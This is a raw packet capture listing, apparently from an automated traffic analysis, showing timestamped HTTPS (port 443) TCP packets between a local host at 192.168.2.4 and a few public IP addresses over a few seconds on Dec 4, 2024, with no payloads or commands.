Dec 4, 2024 12:17:21.006130934 CET	49790	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.006160021 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.006182909 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.008994102 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.009032965 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.009171963 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.009699106 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.009710073 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.099231958 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.099301100 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.099515915 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.099553108 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.099570036 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.099579096 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.099584103 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.102334023 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.102375031 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.102562904 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.103256941 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.103270054 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.243916035 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.279692888 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.279740095 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.280889988 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.280947924 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.312828064 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.312933922 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.313050985 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.313077927 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.356084108 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.432348967 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.477406025 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.478861094 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.540148973 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.560789108 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.560812950 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.560977936 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.561006069 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.562232018 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.562236071 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.562246084 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.562297106 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.564937115 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.618274927 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.623528957 CET	443	49800	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.623543024 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.654396057 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.654531002 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.654748917 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.654881001 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.654894114 CET	443	49800	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.654937983 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.655143023 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.655164957 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.655250072 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.655261993 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.655977011 CET	443	49800	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.656037092 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.656066895 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.656105995 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.656975031 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.656984091 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.693718910 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.693799973 CET	443	49800	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.696388006 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.696921110 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.743267059 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.743278027 CET	443	49800	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:22.750747919 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.758641958 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.758668900 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.759673119 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.759680033 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.774593115 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.778669119 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.778698921 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.780006886 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.780013084 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.790129900 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:22.790539980 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.795804977 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.795831919 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.796264887 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.796269894 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.882689953 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.883737087 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.883768082 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:22.884407043 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:22.884413004 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.057946920 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.058018923 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.058079004 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.058290958 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.058315992 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.058345079 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.058351994 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.061198950 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.061223984 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.061302900 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.061444998 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.061461926 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.109824896 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.110677004 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.110739946 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.127271891 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.127301931 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.194546938 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.194631100 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.194684982 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.212383032 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.212418079 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.212431908 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.212439060 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.219047070 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.219120979 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.219172955 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.234332085 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.234427929 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.234476089 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.256427050 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.256453037 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.256465912 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.256473064 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.257654905 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.257683992 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.257695913 CET	49805	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.257703066 CET	443	49805	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.262094021 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.262131929 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.262206078 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.262331963 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.262368917 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.262422085 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.262955904 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.262986898 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.263035059 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.263109922 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.263123989 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.263183117 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.263197899 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.263272047 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.263286114 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.328448057 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.328589916 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.328648090 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.329327106 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.329391003 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.329433918 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.330019951 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.330034971 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.330046892 CET	49806	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.330051899 CET	443	49806	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.331413031 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.331434965 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.334733009 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.334760904 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.334815025 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.335190058 CET	49813	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:23.335202932 CET	443	49813	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:23.349507093 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.349905014 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.349944115 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.349947929 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.349963903 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.349998951 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.350884914 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.364650965 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.364706039 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.364722967 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.373184919 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.373230934 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.373239994 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.377337933 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.377377987 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.377387047 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.431252003 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.471385956 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.525023937 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.525043011 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.551366091 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.551428080 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.551443100 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.554728985 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.554795027 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.554804087 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.567306042 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.567364931 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.567373991 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.575937986 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.575992107 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.576004028 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.588407993 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.588459015 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.588470936 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.601412058 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.601464033 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.601473093 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.615076065 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.615140915 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.615154028 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.628649950 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.628703117 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.628720045 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.642440081 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.642525911 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.642540932 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.656191111 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.656245947 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.656260967 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.669734001 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.669836044 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.669852018 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.680499077 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.680548906 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.680577040 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.727597952 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.752296925 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.754635096 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.754686117 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.754703999 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.759392977 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.759442091 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.759454966 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.766179085 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.766230106 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.766242027 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.771192074 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.771240950 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.771253109 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.781706095 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.781761885 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.781770945 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.793375015 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.793422937 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.793433905 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.805924892 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.805989981 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.806003094 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.816414118 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.816457987 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.816467047 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.828053951 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.828103065 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.828109980 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.828121901 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.828160048 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.841387987 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.849384069 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.849461079 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.849474907 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.860883951 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.860919952 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.860932112 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.860944033 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.860991955 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.868690014 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.878458977 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.878503084 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.878516912 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.887211084 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.887259007 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.887269974 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.895824909 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.895874023 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.895884037 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.905138016 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.905189037 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.905200005 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.913961887 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.914020061 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.914028883 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.922668934 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.922760010 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.922769070 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.928993940 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.929044962 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.929054976 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.936455965 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.936503887 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.936512947 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.940059900 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.940112114 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.940119982 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.954303980 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.954353094 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.954372883 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.955684900 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.955741882 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.955750942 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.959580898 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.959634066 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.959651947 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.963340044 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.963383913 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.963393927 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.972285986 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.972341061 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.972349882 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.984040976 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.984091997 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.984102011 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.985790014 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.985874891 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.985883951 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.996958017 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.997004986 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.997025013 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.998210907 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.998246908 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.998256922 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.998267889 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.998327017 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.998502970 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:23.998550892 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:23.998610973 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:24.778373003 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:24.778845072 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:24.778882980 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:24.779308081 CET	49808	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:24.779319048 CET	443	49808	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:24.787550926 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:24.787584066 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:24.787753105 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:24.787914991 CET	49819	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:24.787928104 CET	443	49819	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:25.036777020 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.037839890 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.037874937 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.038429022 CET	49811	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.038436890 CET	443	49811	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.044513941 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.045092106 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.045120955 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.046864986 CET	49812	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.046875000 CET	443	49812	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.054270029 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.054856062 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.054886103 CET	443	49810	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:25.055296898 CET	49810	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:25.055300951 CET	443	49810	13.107.246.63	192.168.2.4
